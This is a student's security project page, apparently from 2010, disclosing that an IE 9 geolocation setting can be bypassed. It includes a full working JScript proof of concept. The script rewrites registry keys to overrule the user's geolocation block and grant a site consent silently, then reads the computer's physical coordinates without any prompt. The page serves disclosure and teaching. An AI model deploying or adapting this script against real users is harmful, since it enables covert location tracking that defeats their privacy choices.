Animéted Studios
The Work of Paige A. Rudnick

Computer Security

Fall 2010

“I want you to learn how to think like an attacker.”
—Nick Hopper

My project for Computer Security was analyzing the private browsing mode of Google Chrome. However, what I've done since I hold is far more interesting as it turns out it's really easy to leak your current location in the world with a little help from HTML5's Geolocation API.

I must admit, I had and have some reservations about publishing this one on the web. I did bring it to Microsoft's attention regarding how easy the exploit detailed herein is to do and they told me that everything is working as designed. I can see their angle but I keep coming back to thinking, "Really?" in my own head.

To run the attached, first you need IE 9. Then just save the following source to a file on your computer and run it with cscript from the Windows command line. For extra paranoia inducing fun, do this while unconnected to a network but with your wireless card still on as the script can still find you!

var bDone = false;

function whereAmI(position)
{
	WScript.Echo("Latitude: " + position.coords.latitude);
	WScript.Echo("Longitude: " + position.coords.longitude);
	WScript.Echo("Accuracy: " + position.coords.accuracy + " meters");	
	bDone = true;
}

function doNotKnow(e)
{
	WScript.Echo('Hello, World');
	bDone = true;
}

//Get a Shell to set a few key keys, note these keys will be for the current user so no UAC prompt will be generated.
var WshShell = WScript.CreateObject ("WScript.Shell");

//if user said no to geolocation, overrule them.
WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\BlockAllWebsites", 0, "REG_DWORD");
WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent", 1, "REG_BINARY");

//add permission to always allow slides.html5rocks.com to use geolocation service
WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent\\slides.html5rocks.com", 0x66, "REG_DWORD"); 

//Make our good friend IE
var IE = new ActiveXObject("InternetExplorer.Application");
IE.Navigate2("slides.html5rocks.com"); //navigate to the site we know we can exploit.

while(IE.Busy)	//wait for naviation to complete.
	WScript.Sleep(100);

//Get our handle to geolocation.
var htmlDoc = IE.Document;
var parentWindow = htmlDoc.parentWindow;
var navigator = parentWindow.navigator;

//where are you?
navigator.geolocation.getCurrentPosition(whereAmI, doNotKnow, {enableHighAccuracy : true, maximumAge : 0, timeout : 5000});

//Wait for the query to complete.
while(!bDone)
	WScript.Sleep(100);

IE.Quit();
			

In summary, what this script does is use the Geolocation object from IE 9 to find out where YOU physically are in the world. It does not matter if you've disabled the Geolocation service in IE 9. You will also not be prompted or warned in any way that you are being tracked. I suspect there are other ways to carry out this exploit, it's just being able to run IE as a COM object makes it really easy to use.